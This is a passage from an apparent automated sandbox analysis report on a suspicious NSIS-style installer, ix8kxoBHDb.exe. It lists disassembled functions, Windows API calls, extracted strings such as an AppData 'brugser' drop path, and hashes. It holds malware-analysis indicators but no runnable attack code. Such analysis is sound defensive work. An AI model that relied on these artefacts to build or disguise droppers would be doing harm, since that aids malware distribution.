Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

Call, xrefs: 004049B1, 004049B6, 004049C1
(7B, xrefs: 0040494D
tH, xrefs: 00404856
C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 004049A0
A, xrefs: 00404973

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A$C:\Users\user\AppData\Roaming\brugser\brugo$Call$tH
API String ID: 2624150263-2701920035
Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A

Function 0040451E Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
GetDlgItem.USER32(?,000003E8), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,000003E8), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D

Strings

Call, xrefs: 004046FB
N, xrefs: 004046BA
tH, xrefs: 0040467A

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N$tH
API String ID: 3103080414-1290530410
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Strings

%ls=%ls, xrefs: 004060A9
[Rename], xrefs: 0040611D, 0040612F

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 0040667C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040667D, 00406682
*?|<>/":, xrefs: 004066CE
"C:\Users\user\Desktop\ix8kxoBHDb.exe", xrefs: 0040667C

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-450781896
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(0001EC36,00000064,00023754), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 3d3304eb45bb23b080e092fab2be1e5bf8cbc78acc5d7d16839361ab4b58e06d
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: 3d3304eb45bb23b080e092fab2be1e5bf8cbc78acc5d7d16839361ab4b58e06d
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 00401DB9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Strings

Tahoma, xrefs: 00401E24

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

unpacking data: %d%%, xrefs: 00402E33, 00402E43
verifying installer: %d%%, xrefs: 00402E3A

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 73B02569 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 73B0121B: GlobalAlloc.KERNEL32(00000040,?,73B0123B,?,73B012DF,00000019,73B011BE,-000000A0), ref: 73B01225

GlobalFree.KERNEL32(?), ref: 73B02657
GlobalFree.KERNEL32(00000000), ref: 73B0268C

Memory Dump Source

Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true

Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: d330101e723b710f9bfadb5cbec11726dbc0cc9e5a986912be449b4f20b71ad4
Instruction ID: a9f301b07c9ba8c5a453d985304e2d4b1a79a415b0c003b342faaaff9d4deb3c
Opcode Fuzzy Hash: d330101e723b710f9bfadb5cbec11726dbc0cc9e5a986912be449b4f20b71ad4
